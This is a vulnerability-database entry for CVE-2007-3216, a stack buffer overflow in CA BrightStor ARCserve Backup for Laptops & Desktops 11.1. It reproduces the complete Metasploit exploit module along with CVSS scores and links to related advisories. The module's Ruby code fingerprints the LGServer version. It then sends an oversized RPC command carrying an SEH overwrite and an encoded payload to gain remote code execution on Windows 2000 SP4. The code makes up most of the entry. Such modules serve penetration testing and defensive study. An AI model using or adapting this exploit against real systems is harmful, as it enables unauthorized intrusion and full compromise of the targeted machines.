Lucene search
HistoryNov 04, 2010 - 10:19 p.m.
CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
8.3
Confidence
Low
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, an attacker could overflow the buffer and execute arbitrary code.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,
an attacker could overflow the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-3216' ],
[ 'OSVDB', '35329' ],
[ 'BID', '24348' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75022ac4 } ],
],
'DisclosureDate' => '2007-06-06',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(1900) ])
end
def check
connect
sock.put("0000000019rxrGetServerVersion")
ver = sock.get_once
disconnect
if ( ver and ver =~ /11\.1\.742/ )
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
rpc_commands = [
"rxsAddNewUser",
"rxsSetUserInfo",
"rxsRenameUser",
"rxsExportData",
"rxcReadSaveSetProfile",
"rxcInitSaveSetProfile",
"rxcAddSaveSetNextAppList",
"rxcAddSaveSetNextFilesPathList"
]
rpc_command = rpc_commands[rand(rpc_commands.length)]
data = rand_text_alpha_upper(62768)
data[58468,8] = generate_seh_record(target.ret)
data[58476,payload.encoded.length] = payload.encoded
sploit = "0000062768" # Command Length Field
sploit << rpc_command # RPC Command
sploit << "~~" # Constant Argument Delimiter
sploit << data
print_status("Trying target #{target.name} with command '#{rpc_command}'...")
sock.put(sploit)
handler
disconnect
end
end
Related
saint
saint
BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow
2008-01-11 00:00:00
BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow
2008-01-11 00:00:00
BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow
2008-01-11 00:00:00
packetstorm
packetstorm
prion
prion
Buffer overflow
2007-06-14 22:30:00
cve
cve
CVE-2007-3216
2007-06-14 22:30:00
checkpoint_advisories
checkpoint_advisories
metasploit
metasploit
cvelist
cvelist
CVE-2007-3216
2007-06-14 22:00:00
nvd
nvd
CVE-2007-3216
2007-06-14 22:30:00
exploitdb
exploitdb
securityvulns
securityvulns
iDefense Security Advisory 09.20.07: CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow Vulnerabilities
2007-09-24 00:00:00
CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Vulnerabilities
2008-04-05 00:00:00
CA ARCServe Backup multiple security vulnerabilities
2007-09-24 00:00:00
seebug
seebug
CA ARCserve Backup多个远程溢出及目录遍历漏洞
2007-09-25 00:00:00
nessus
nessus
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
8.3
Confidence
Low
Related for MSF:EXPLOIT-WINDOWS-BRIGHTSTOR-LGSERVER_MULTI-